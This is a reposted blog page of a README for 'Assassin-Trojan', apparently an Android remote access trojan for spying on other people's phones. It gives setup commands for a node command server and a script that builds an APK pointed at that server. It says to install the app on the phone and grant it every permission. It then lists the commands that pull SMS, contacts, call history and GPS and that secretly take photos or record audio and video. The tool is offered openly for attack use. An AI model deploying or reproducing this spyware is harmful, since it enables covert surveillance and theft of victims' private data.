博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Hack Others' Android Devices Within 5 Minutes
阅读量:6031 次
发布时间:2019-06-20

本文共 4302 字,大约阅读时间需要 14 分钟。

Assassin-Trojan---Hack Others’ Android Devices Within 5mins

hack the android device with only one instruction on your terminal

Base Environment

  • Operating System :MacOS/Linux is required
    • of course you can build the app yourself on windows
  • you are not required know how these tools work on your machine,but install them first!

And now let me show you the crazy snapshot

Snapshot

as you can see

  • "ASSASSIN" means the server is started up successfully
  • then open another terminal, and cd the /project/server, execute a cmd and you will receive response as you can see at second pic, it shows all of contacts on your device.

Features

  • get Sms_List
  • send Sms to destinationAddress
  • get Calling_History
  • get GPS
  • get Contacts_List

something that u can do in background

  • call someone
  • take a photo
  • record audio
  • record video of course the duration decided by yourself

Construction

Follow me, within 5 mins, you can hack the phone

Usage

Options:  -V, --version             output the version number  -a,--assassin 
select a command post to the clients if you choose the shadow you should input the cmd -t to choose a type between pic/audio/video [sms,contacts,call,gps,shadow] (default: "sms") -C,--Clients show every client info -d,--address
input a phone num who you want to send a msg -m,--msg
you should write the msg content, if your command is sms -t,--type
select a type between pic/audio/video and you should input the -l to choose the camera lens [pic,audio,video] -c,--client
select a client to post the command -l,--lens
which camera lens that you want to open [0,1] -h, --help output usage information复制代码

Step.1 clone/download the project and start up the server

1. git clone git@github.com:honglvt/TalentRAT.git / or download the project yourself on the github2. cd the project path such as: ~/AndroidProject/ProjectPath/Server/3. cd Server 4. npm install5. npm startnow you can see the terminal console "ASSASSIN"复制代码

Step.2 build assasin.apk with shell at project folder

befor build the apk

  • confrim that you have prepare the env for building the app
  • connect the android device to ur PC
  • enable the develop mode on ur android device if you can not do step.2 and step.3 you can build the assassin.apk and install it to your device manually now let's start assembleApk
at the first time when you download the project you should confirm your OS type mac or linux, and get your server IPAdress by "ifconfig/ipconfig" 0.  chmod 777 ./assembleApk.sh    chmod 777 ./installNewestApk.sh1.  execute the assemble shell  "./assaembleApk.sh OS serverIP"            serverIP type as 127.0.0.1:3000       OS type as mac or linux    as follows:    "./assembleApk.sh mac 127.0.0.1:3000"    "./assembleApk.sh linux localHost:3000"2.  ./installNewestApk.sh    if you are not able to connect the device to your PC, send the apk by email or xx and install it manually3.  look at your device, the apk has been installed into your device    run it     grant all of permissions     and now you can see { a user connected info }at terminal you have opened at Step.1复制代码

Step.3 execute command,then you will get whaterver you want!!!

cmd ./assassin.js -a sms -c 9910294050493
description select the command between [sms,contacts,call,gps,shadow] if you choose the shadow you should also use -t to choose a type between pic/audio/video

args with -c can be gotten at server terminal {a user connected info} type the cmd into a new terminal at ~/project/Server and the result:

{    "command": "send_contacts_list",    "IMEI": "99001249798100"}response is : [{name:ASX,phoneNum:2345 67}]复制代码

Prompt

  • keep node server alive when you send a command
  • cmd with ./assassin.js will return a Json data you can do whatever with the response
  • if you want to get a pic or video you should type the cmd as follow:
    • ./assassin.js -a shadow -c 123456 -t pic -l 0
    • then you can find the pic has saved on the */project/Server/public/images/xxxx.jpeg'
    • the same with other shadow
  • the duration in recording video or audio is decided by yourself

Finally

  • the assassin version is beta 1.0.0
  • adapted android Lollipop-Pie
  • commit issues to me
  • commit features to me
  • more features are in developing

Contact information QQ群

转载地址:http://wkuhx.baihongyu.com/

你可能感兴趣的文章
C++流的streambuf详解及TCP流的实现
查看>>
《量化金融R语言初级教程》一2.5 协方差矩阵中的噪声
查看>>
mysql到elasticsearch数据迁移踩坑实践-Ali0th
查看>>
Python轻量级数据分析库DaPy
查看>>
beetl 和 shrio 结合
查看>>
相对/绝对路径,cd命令,mkdir/rmdir命令,rm命令
查看>>
tomcat中web.xml各配置项的意义
查看>>
Nodejs学习笔记(二):《node.js开发指南》代码中需要注意的几点
查看>>
Ztree异步加载自动展开节点
查看>>
反射操作公共成员变量
查看>>
Android热修复升级探索——代码修复冷启动方案
查看>>
学校宿舍的深夜之思考
查看>>
VB.NET 生成DBF文件
查看>>
编译安装nginx 1.9.15
查看>>
我的友情链接
查看>>
新的开始~~~
查看>>
字符串的扩展
查看>>
存储过程中调用webservice
查看>>
神奇语言 python 初识函数
查看>>
Windows安装Composer出现【Composer Security Warning】警告
查看>>